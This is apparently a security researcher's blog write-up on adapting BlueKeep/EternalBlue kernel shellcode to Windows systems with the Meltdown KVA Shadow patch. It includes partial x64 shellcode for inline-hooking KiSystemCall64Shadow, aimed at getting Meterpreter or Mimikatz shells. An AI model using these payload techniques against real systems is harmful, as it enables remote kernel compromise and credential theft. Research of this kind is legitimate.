Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

- Background

- Meltdown CPU Vulnerability

- Existing Remote Kernel Payloads

- Hooking KiSystemCall64Shadow

- Conclusion

Background

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

— Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently break the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors load, evaluate, and branch ("speculate") well before these operations are "actually" due to run. This can cause effects that are measurable through side channels such as cache timing attacks. Through some clever engineering, Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, the counterpart of Kernel Page-Table Isolation (KPTI) on Linux. Both are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

- Swap to kernel GS segment

- Save user stack to KPCR->Prcb.UserRspShadow

- Check if KPCR->Prcb.ShadowFlags first bit is set

- Set CR3 to KPCR->Prcb.KernelDirectoryTableBase

- Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

Existing Remote Kernel Payloads

The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

Hooking IA32_LSTAR MSR

In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc0000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

Double Fault Root Cause Analysis





Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with an UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

We can see that at this point, user mode can see the KiSystemCall64Shadow function:

However, user mode cannot see our shellcode location:

The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!
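To make the failure concrete, here is a toy Python model of the two sets of page tables. It is only a sketch: the page names are made-up labels rather than real addresses, and a Python exception stands in for the fault that the real system escalates into the double fault described above.

```python
# Toy model: which pages each set of page tables can translate.
# The page names are illustrative labels, not real addresses.
KERNEL_TABLES = {"KVASCODE", "ntoskrnl_text", "nonpaged_pool_shellcode"}
SHADOW_TABLES = {"KVASCODE"}  # the small subset still mapped while in user mode


class PageFault(Exception):
    """Raised when the active page tables cannot translate a page."""


def fetch(page, active_tables):
    """Simulate an instruction fetch through the active page tables."""
    if page not in active_tables:
        raise PageFault(page)
    return page


def syscall_entry(lstar_target):
    """At syscall time CR3 still points at the shadow (user) tables."""
    return fetch(lstar_target, SHADOW_TABLES)


def outcome(lstar_target):
    """Return 'ok' if the syscall target is reachable, 'fault' otherwise."""
    try:
        syscall_entry(lstar_target)
        return "ok"
    except PageFault:
        return "fault"
```

Pointing the model's LSTAR at `"KVASCODE"` works, while pointing it at `"nonpaged_pool_shellcode"` faults, which is the situation the MSR hook creates on a KVA Shadow target.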

Hooking KiSystemCall64Shadow



So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

Heuristic Offset Detection

We want to accomplish two things:

- Install our hook in a spot after CR3 has been loaded with the kernel page tables.

- Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2 bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian, i.e. the bytes 00 6a 2b 65) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

The following shellcode is the 0th stage that runs after exploitation:

payload_start:

; read IA32_LSTAR

mov ecx, 0xc0000082

rdmsr

shl rdx, 0x20

or rax, rdx

push rax

; rsi = &KiSystemCall64Shadow

pop rsi

; this loop stores the offset to push 2b into ecx

_find_push2b_start:

xor ecx, ecx

mov ebx, 0x652b6a00

_find_push2b_loop:

inc ecx

cmp ebx, dword [rsi + rcx - 1]

jne _find_push2b_loop

This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.
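The scan is easy to prototype outside the kernel. Below is a minimal Python sketch of the same logic. The helper names are mine, and the MSR halves and the byte buffer used to exercise it are invented stand-ins, not a real ntoskrnl dump.

```python
import struct

# 0x652b6a00 stored little endian is the byte sequence 00 6a 2b 65.
PATTERN = struct.pack("<I", 0x652B6A00)


def combine_msr(edx, eax):
    """rdmsr returns the MSR in edx:eax; rebuild the 64-bit value."""
    return ((edx & 0xFFFFFFFF) << 32) | (eax & 0xFFFFFFFF)


def find_push2b(code):
    """Return the offset of 'push 2b' (6a 2b) inside code, or None.

    The shellcode loop compares the dword at [rsi + rcx - 1], so the
    returned offset is one past the start of the 4-byte pattern.
    Unlike the shellcode, this version gives up when nothing matches.
    """
    start = code.find(PATTERN)
    if start < 0:
        return None
    return start + 1


# Invented stand-in bytes for a syscall routine: filler, then the pattern.
fake_routine = b"\x90" * 0x1F + b"\x00\x6a\x2b\x65\x90"
offset = find_push2b(fake_routine)
```

With this buffer, `offset` is 0x20 and `fake_routine[offset:offset + 2]` is the `6a 2b` encoding of push 2b.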

The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

Atomic x64 Function Hooking

It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b instruction!

Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however, in every ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes' worth of NOPs preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

; install hook call in KiSystemCall64Shadow NOP padding

install_big_jmp:

; bytes 90 57 48 bf = nop; push rdi; movabs rdi, &fake_syscall_hook;

mov dword [rsi - 0x10], 0xbf485790

lea rdi, [rel fake_syscall_hook]

mov qword [rsi - 0xc], rdi

; bytes 57 c3 = push rdi; ret;

mov word [rsi - 0x4], 0xc357

; ...

fake_syscall_hook:

; ...
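As a sanity check on the byte layout, here is a small Python sketch that assembles the same 16 bytes the three mov instructions write into the padding. The function name and the hook address are hypothetical, and I am assuming the two untouched trailing bytes are still NOPs.

```python
import struct


def build_big_jmp(hook_addr):
    """Build the 16 bytes that end up at [syscall - 0x10, syscall)."""
    # dword at -0x10: 90 | 57 | 48 bf = nop; push rdi; movabs rdi, imm64
    gadget = struct.pack("<I", 0xBF485790)
    # qword at -0xc: the imm64 operand, i.e. &fake_syscall_hook
    gadget += struct.pack("<Q", hook_addr)
    # word at -0x4: 57 | c3 = push rdi; ret
    gadget += struct.pack("<H", 0xC357)
    # bytes at -0x2 and -0x1 are never written (assumed to remain NOPs)
    gadget += b"\x90\x90"
    return gadget


# Hypothetical hook address, for illustration only.
gadget = build_big_jmp(0xFFFFF80012345678)
```

The original rdi is pushed first and the hook address second, so the ret transfers to the hook with the caller's rdi left on top of the stack.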

Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

; install tiny jmp to the NOP padding jmp

install_small_jmp:

; rsi = &syscall+push2b

add rsi, rcx

; eax = jmp -x

; fix -x to actual offset required

mov eax, 0xfeeb

shl ecx, 0x8

sub eax, ecx

sub eax, 0x1000

; push 2b => jmp -x;

mov word [rsi], ax
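The arithmetic here is terse, so here is a Python sketch that mirrors it and decodes where the resulting short jmp lands. The function names and the base address are mine; only the constants come from the shellcode.

```python
def small_jmp_word(push2b_offset):
    """Mirror the shellcode math: the 16-bit value stored over push 2b."""
    eax = 0xFEEB                  # bytes eb fe = jmp short to itself (rel8 = -2)
    eax -= push2b_offset << 8     # shl ecx, 8; sub eax, ecx
    eax -= 0x1000                 # back up 0x10 more, to the big jmp gadget
    return eax & 0xFFFF           # only ax is written


def jmp_target(base, push2b_offset):
    """Decode the short jmp and return the address it transfers to."""
    word = small_jmp_word(push2b_offset)
    opcode = word & 0xFF
    rel8 = word >> 8
    if opcode != 0xEB:
        raise ValueError("not a short jmp")
    if rel8 >= 0x80:              # sign-extend the 8-bit displacement
        rel8 -= 0x100
    # rel8 is relative to the end of the 2-byte instruction
    return base + push2b_offset + 2 + rel8
```

For an offset of 0x20 the stored word is 0xceeb (bytes eb ce), and the target works out to base - 0x10. Since rel8 only reaches back 0x80 bytes, the trick holds while the push 2b offset is at most 0x6e; past that, the displacement wraps into a forward jump.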

And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

On the next system call, the kernel stack and page tables are loaded first; our small jmp hook then jumps to the big jmp, which jumps to our fake syscall handler at PASSIVE_LEVEL.

Cleaning Up the Hook

Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

; this syscall hook is called AFTER kernel stack+KVA shadow is setup

fake_syscall_hook:

; save all volatile registers

push rax

push rbp

push rcx

push rdx

push r8

push r9

push r10

push r11

mov rbp, STAGE_SHARED_MEM

; use lock cmpxchg for queueing APC only one at a time

single_thread_gate:

xor eax, eax

mov dl, 1

lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl

jnz _restore_syscall

; only 1 thread has this lock

; allow interrupts while executing ring0 to ring3

sti

call r0_to_r3

cli

; all threads can clean up

_restore_syscall:

; calculate offset to 0x2b using shared storage

mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]

mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]

add rdi, rax

; atomic change small jmp to push 2b

mov word [rdi], 0x2b6a

All threads restore the push 2b, as the code flow results in fewer bytes, no extra locking, and shouldn't matter.
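The single_thread_gate can be modeled in userland to show why only one thread ever queues the APC. This is just a sketch: a Python lock stands in for the hardware lock prefix, and the names are mine rather than anything from the payload.

```python
import threading

_bus_lock = threading.Lock()   # stands in for the hardware LOCK prefix
shared = bytearray(1)          # shared[0] models SINGLE_THREAD_LOCK, initially 0
winners = []                   # thread ids that got past the gate


def lock_cmpxchg_byte(mem, index, expected, new):
    """Atomically: if mem[index] == expected, store new and report success."""
    with _bus_lock:
        if mem[index] == expected:
            mem[index] = new
            return True
        return False


def fake_syscall_hook(thread_id):
    # xor eax, eax / mov dl, 1 / lock cmpxchg: expect 0, store 1
    if lock_cmpxchg_byte(shared, 0, 0, 1):
        winners.append(thread_id)  # only this thread would call r0_to_r3
    # every thread, winner or not, would continue to _restore_syscall


threads = [threading.Thread(target=fake_syscall_hook, args=(i,)) for i in range(8)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

However the eight threads interleave, exactly one of them sees the byte as 0 and flips it, so `winners` always ends up with a single entry.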

Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

_syscall_hook_done:

; restore register values

pop r11

pop r10

pop r9

pop r8

pop rdx

pop rcx

pop rbp

pop rax

; rdi still holds the &KiSystemCall64Shadow+push2b address!

; but needs to be restored

; do not cause bugcheck 0xc4 arg1=0x91

mov qword [rsp-0x20], rdi

pop rdi

; return to &KiSystemCall64Shadow+push2b

jmp [rsp-0x28]

You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.
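The two offsets look mismatched at first glance (0x20 on the write, 0x28 on the jmp), so here is a tiny Python stack model that walks through the last three instructions. The class, the starting rsp, and the register values are all invented for illustration.

```python
class Stack:
    """Minimal 64-bit stack model: memory is a dict keyed by address."""

    def __init__(self, rsp):
        self.rsp = rsp
        self.mem = {}

    def push(self, value):
        self.rsp -= 8
        self.mem[self.rsp] = value

    def pop(self):
        value = self.mem[self.rsp]
        self.rsp += 8
        return value


def return_sequence(stack, rdi):
    """Replay the final three instructions of the hook."""
    stack.mem[stack.rsp - 0x20] = rdi      # mov qword [rsp-0x20], rdi
    rdi = stack.pop()                      # pop rdi (rsp grows by 8)
    target = stack.mem[stack.rsp - 0x28]   # jmp [rsp-0x28]
    return rdi, target, stack.rsp


stack = Stack(0x1000)
stack.push(0x1111)  # original rdi, as saved by the big jmp gadget
rdi, target, rsp = return_sequence(stack, 0xDEAD)
```

Because the pop moves rsp up by 8 in between, [rsp-0x20] before the pop and [rsp-0x28] after it name the same slot. In the model, rdi comes back as 0x1111, the jmp target is 0xdead, and rsp is back at 0x1000.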

Conclusion

Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours, so I'm guessing KPP isn't fast enough, just like with the IA32_LSTAR method.

It's simple, it's obvious, it's hacky; but it works and so it's what you want.